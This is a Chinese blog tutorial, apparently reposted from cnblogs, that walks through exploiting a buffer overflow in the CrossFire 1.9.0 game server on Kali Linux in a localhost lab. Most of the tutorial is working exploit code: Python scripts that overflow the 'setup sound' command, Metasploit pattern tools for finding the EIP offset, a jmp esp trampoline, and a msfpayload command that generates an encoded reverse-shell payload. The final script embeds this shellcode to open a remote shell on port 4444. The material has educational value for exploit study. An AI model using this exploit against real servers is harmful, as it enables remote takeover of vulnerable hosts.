linux溢出教程,Linux下简单的缓冲区溢出

最新推荐文章于 2022-07-13 11:44:18 发布
最新推荐文章于 2022-07-13 11:44:18 发布
阅读量283 收藏
点赞数
文章标签: linux溢出教程

缓冲区溢出是什么?

科班出身,或者学过汇编的应该知道,当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被“撑爆”,从而覆盖了相邻内存区域的数据

成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果

CrossFire 多人在线RPG游戏

1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞 (服务端)

调试工具 edb

运行平台 kali 2.0 x64虚拟机

Linux中内存保护机制 DEP

ASLR

堆栈 cookies

堆栈粉碎

漏洞太老,避免测试中我们的虚拟机被劫持,可以通过iptables设置目标端口只允许本地访问,如果网络是仅主机可以省略

#4444端口是一会开放的测试端口,只允许本地访问 iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP #13327是服务端端口,只允许本地访问 iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP

创建/usr/games/目录,将crossfire1.9.0服务端解压到目录

#解压touch /usr/games/cd/usr/games/ tar zxpf crossfire.tar.gz

1530344599731713.png

出现Waiting for connections即可,有问题看看Error

#开启调试 edb--run /usr/games/crossfire/bin/crossfire

1530344601826809.png

右下角是paused暂停状态

菜单栏 Debug => Run(F9) 点击两回可以运行起来

可以通过命令查看程序端口信息

#查看开放端口 netstat-pantu | grep 13327

EIP中存放的是下一条指令的地址

这个程序和一般的溢出不同,它必须发送固定的数据量才可以发生溢出,而不是大于某个数据量都可以,我们构造如下python程序测试

#! /usr/bin/python importsocket host= "127.0.0.1"crash= "\x41" * 4379 ## \x41为十六进制的大写A buffer = "\x11(setup sound" + crash + "\x90\x00#" ## \x90是NULL,\x00是空字符 s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327)) data= s.recv(1024)printdata s.send(buffer) s.close()print "[*]Payload Sent!"

运行后,edb报错如下

1530344602502642.png

意思是EIP(存放一下条执行命令的地址)已经被覆盖成上图黑体中的地址,而计算机找不到这个地址。这个地址正是由我们输入的A,说明EIP可控,存在溢出。

这里你也可以测试增加一个A或者减少一个A发送,会发现后边两个数值都不是A,都不可控,也就是说数据量只有为4379时EIP才完全可控

为了查看到底是哪个位置的A才是溢出后的EIP地址,借助工具生成唯一字符串

cd /usr/share/metasploit-framework/tools/exploit/./pattern_create.rb -l 4379

1530344602940580.png

复制下来,构造如下python脚本

#! /usr/bin/python importsocket host= "127.0.0.1"crash= "唯一字符串"buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327)) data= s.recv(1024)printdata s.send(buffer) s.close()print "[*]Payload Sent!"

开启edb启动程序,运行python程序

1530344602565319.png

利用工具确认字符串的位置

cd /usr/share/metasploit-framework/tools/exploit/./pattern_offset.rb -q 46367046

1530344603252066.png

我们构造如下python脚本验证

#! /usr/bin/python importsocket host= "127.0.0.1"crash= ‘A‘*4368 + ‘B‘*4 + ‘C‘*7 ## 凑够4379个字符buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327)) data= s.recv(1024)printdata s.send(buffer) s.close()print "[*]Payload Sent!"

1530344604945727.png

可以看到EIP地址被精准的填充为B字符

1530344604681783.png

右键ESP,选择 Follow In Dump 查看数据

1530344605157072.png

因为必须是精确的字符才能溢出,就是说ESP寄存器只能存放7个字符,显然无法存放shellcode

几个寄存器都查看后,选择了EAX。因为EAX存放的是我们之前发送的几千个A,是可控的,且有足够的大小存放shellcode

1530344605890970.png

思路就是让EIP存放EAX的地址,然后在地址上加12,直接从第一个A的位置开始执行。但是各个机器的EAX的地址也各不相同,不具有通用性,所以直接跳转的思路就放弃。

既然ESP可以存放7个字符,想到了跳转EAX并偏移12

1530344605314416.png

构造如下python代码运行

#! /usr/bin/python importsocket host= "127.0.0.1"crash= ‘A‘*4368 + ‘B‘*4 + ‘\x83\xc0\x0c\xff\xe0\x90\x90‘buffer= "\x11(setup sound" + crash + "\x90\x00#"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327)) data= s.recv(1024)printdata s.send(buffer) s.close()print "[*]Payload Sent!"

首先EIP地址仍然是精准的四个B

1530344605755542.png

ESP => Follow In Dump 查看

1530344606507391.png

83 c0 0c ff e0 90 90 说明这里也完美写入

思路就是EIP => ESP => EAX,EAX存放shellcode,因为ESP地址不固定,需要借助固定的地址跳转

打开edb,菜单栏 Plugins => OpcodeSearcher => OpcodeSearch

选择crossfire程序,ESP -> EIP,选择一个jmp esp 的地址,这个地址是不会变的

1530344607319620.png

菜单栏 plugin => breakpointmanager => breakpoints 选择add增加我们上边选择的地址的断点用来测试。

然后我们测试坏字符,经过测试坏字符是\x00\x0a\x0d\x20

生成shellcode并过滤坏字符

cd /usr/share/framework2/./msfpayload -l #可以生成的shellcode的种类 ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

构建python脚本

#!/usr/bin/python importsocket host= "127.0.0.1"shellcode=("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+ "\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+ "\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"+ "\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+ "\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+ "\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+ "\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+ "\x1a\x99\x43\x71\x97\x54\x03") crash= shellcode + "A"*(4368-105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"buffer= "\x11(setup sound" +crash+ "\x90\x90#)"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)print "[*]Sending evil buffer..."s.connect((host,13327)) data= s.recv(1024)printdata s.send(buffer) s.close()print "[*]Payload Sent!"

监听本地的4444端口,即可获取一个shell

原文:https://www.cnblogs.com/systemVITO/p/9246752.html

weixin_39529463
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux send 失败_Linux的SOCKET编程/tcp详解
weixin_35414484的博客
01-06 658
1. 网络中进程之间如何通信一起学习的可以后台私信“资料”送相关学习资料可以一起学习交流大家也可以关注一下,记得后台私信“资料”送学习视频需要C/C++ Linux服务器架构师学习资料后台私信“资料”(资料包括C/C++,Linux,golang技术,Nginx,ZeroMQ,MySQL,Redis,fastdfs,MongoDB,ZK,流媒体,CDN,P2P,K8S,Docker,TCP/IP,...
linux 查看socket缓冲区溢出_跟小黑学漏洞利用开发之SEH溢出
weixin_29666725的博客
12-25 604
书接上回,我们继续研究如何在Win32系统上利用缓冲区漏洞,完成我们新漏洞利用开发,主要是关于SEH漏洞利用问题。相比上一篇直接覆盖EIP相比,EIP覆盖此效果虽然很好,但也存在稳定性问题(如无法找到jmp指令,或者需要地址硬编码)并且还遇到缓冲区大小问题,从而可能限制用于目标机器shellcode空间问题。写到这里有些人想说对于SafeSEH和SEHOP绕过利用这个我们有机在后续篇文章研...
两年数据对比柱形图_行业竞标对比图太过单调?这里有新做法!
weixin_39688451的博客
11-19 784
无比较不分析,数据分析永远绕不开数据比较,预实比较、同期比较......这些比较最终都可以通过图表来呈现。1月份我写过一篇如何做预实对比图的文章《领导想看的预实对比图,究竟长哪样?》这个图表将实际数与完成率清晰明了地呈现出来了。但有些时候的比较,并不需要呈现二者的差异率,比如供需比较、行业比较等。相比之下,这些比较用指标本身的数据来呈现更直观。那这类比较要怎么呈现呢?除了最基本的双柱形图外,今天...
【深度学习高效小trick】使用Linux服务器一段时间后出现‘Socket error Event: 32 Error: 10053’,快速带你解决连接失败!
Thebest_jack的博客
07-13 1万+
使用Linux服务器一段时间后出现Socket error Event: 32 Error: 10053,快速带你解决连接失败!
linux socket编程中的recv和send的返回值介绍及其含义。
热门推荐
qq_26105397的博客
07-10 4万+
recv方法:模型: #include <sys/types.h> #include <sys/socket.h> ssize_t recv(int sockfd, void *buf, size_t len, int flags);参数:sockfd创建的文件描述符fd,buf接收数据的缓冲区,len接收数据的长度,flags表示信息,默认设置为0当应用程序调用recv接...
Linux环境下缓冲区溢出的攻击分析.pdf
09-06
Linux操作系统在信息技术领域占据着重要地位,而缓冲区溢出作为信息安全的一大威胁,对系统稳定性和安全性构成了严重挑战。缓冲区溢出攻击主要是通过向程序的缓冲区写入超出其容量的数据,导致数据溢出并可能覆盖...
Linux系统缓冲区溢出攻击的机理分析.pdf
09-07
"Linux系统缓冲区溢出攻击的机理分析" Linux系统缓冲区溢出攻击是目前最常用的黑客攻击技术之一。本文分析了这种攻击技术的原理,指出了Linux系统中进行这种攻击时,本地攻击和远程攻击的差异,并总结和归纳了几种...
Linux下基本栈溢出攻击
01-30
基本的栈溢出攻击,是最早产生的一种缓冲区溢出攻击方法,它是所有其他缓冲区溢出攻击的基础。但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生...
Linux缓冲区溢出攻击检测与防范技术.pdf
09-07
Linux 缓冲区溢出攻击检测与防范技术 Linux 缓冲区溢出攻击是一种常见的网络攻击方式,黑客通过溢出攻击可以获得系统的控制权。本文将详细介绍 Linux 缓冲区溢出攻击的原理、检测方法和防范技术。 缓冲区溢出攻击...
防范Linux缓冲区溢出攻击.pdf
09-07
防范Linux缓冲区溢出攻击.pdf
缓冲区溢出教程
11-27
缓冲区溢出教程,适合初学者学习缓冲区
缓冲区溢出漏洞原理及Linux下利用
江左盟的博客
12-26 1万+
常见保护措施 ASLR ASLR 是一种防范内存损坏漏洞被利用的计算机安全技术。ASLR通过随机放置进程关键数据区域的地址空间来防止攻击者能可靠地跳转到内存的特定位置来利用函数,以防范恶意程序对已知地址进行Return-to-libc攻击。ASLR在每次启动操作系统时随机化加载应用程序的基地址和dll,只能随机化 堆、栈、共享库的基址。 Linux下查看: cat /proc/sys/kernel/randomize_va_space 值为0表示未开启,值为1表示半开启,仅随机化栈和共享库,值为2表示全
linux查看socket统计数据,Linux中查看socket状态
weixin_42191359的博客
05-12 1278
Linux中查看socket状态:cat /proc/net/sockstat #(这个是ipv4的)sockets: used 137TCP: inuse 49 orphan 0 tw 3272 alloc 52 mem 46UDP: inuse 1 mem 0RAW: inuse 0FRAG: inuse 0 memory 0说明:sockets: used:已使用的所有协议套接字总量TCP:...
查看socket连接状态以及收发缓冲区信息
哇哇哇,真的学到了!!!
07-04 3270
相关文档:Socket缓冲区linux设置TCP接收缓存,TCP缓存设置及自调节_尹昉的博客-CSDN博客调整TCP缓冲区_vector6_的博客-CSDN博客_tcp 缓存区linux socket使用情况 ss -s ss -t -a | cat /proc/net/socketstatlinux百万并发之 tcp_mem - 走看看以上为查看资料。例:发现问题:socket连接经常一段时间连接超时,但是重启后能正常访问。查看socket端口相关连接信息 可以发现存在连接的接收缓冲区非空,并且连接
Java线上故障排查完整套路和技巧分享[图]
minemi的博客
12-11 691
线上故障主要包括CPU、磁盘、内存以及网络问题,而大多数故障可能包含不止一个层面的问题,所以进行排查时候尽量四个方面依次排查一遍。同时例如jstack、jmap等工具也是不囿于一个方面的问题的,基本上出问题就是df、free、top三连,然后依次jstack、jmap伺候,具体问题具体分析即可。 CPU 一般来讲我们首先排查CPU方面的问题。CPU异常往往还是比较好定位的。原因包括业务逻辑问题(死循环)、频繁gc以及上下文切换过多。而最常见的往往是业务逻辑(或者框架逻辑)导致的,可以使用jstack来
Linux下的Socket异常导致OutOfMemory,定位结果Linux下JVM Bug。
zhao3546
09-25 305
现网出现一个问题,Client访问我们的接入服务器A,A将请求转给服务器B(Http请求,使用HttpURLConnection实现);某天,B服务器突然宕机,Client在登录的过程中,经常需要访问B,B宕机一段时间后,A也报出OutOfMemoryError。 这个问题定位了很久,开始以为我们的代码有问题,以为IO流没有关闭,打开GC日志进行压力测试,没有发现堆内存问题。 但JVM还是...
linux socket 缓存查看,linux下查看系统socket读写缓冲区
weixin_33384949的博客
05-15 2222
一:linux下查看系统socket读写缓冲区大小配置:http://blog.csdn.net/herecles/article/details/81460171. tcp 收发缓冲区默认值[root@ www.linuxidc.com]# cat /proc/sys/net/ipv4/tcp_rmem4096 87380 416153687380 :tcp接收缓冲区的默认值[roo...
缓存区溢出检测工具BED
04-12 481
缓存区溢出检测工具BED 缓存区溢出(Buffer Overflow)是一类常见的漏洞,广泛存在于各种操作系统和软件中。利用缓存区溢出漏洞进行攻击,导致程序运行失败、系统崩溃。渗透测试人员利用这...
Linux缓冲区溢出实战:理解溢出机制
"Linux下的缓冲区溢出实践" 实验"Linux下的缓冲区溢出实践1"主要探讨了在Ubuntu 20.04操作系统和Linux Kernel 5.4.0-53-generic环境下,如何理解和利用缓冲区溢出的机制。缓冲区溢出是一种常见的安全漏洞,当程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值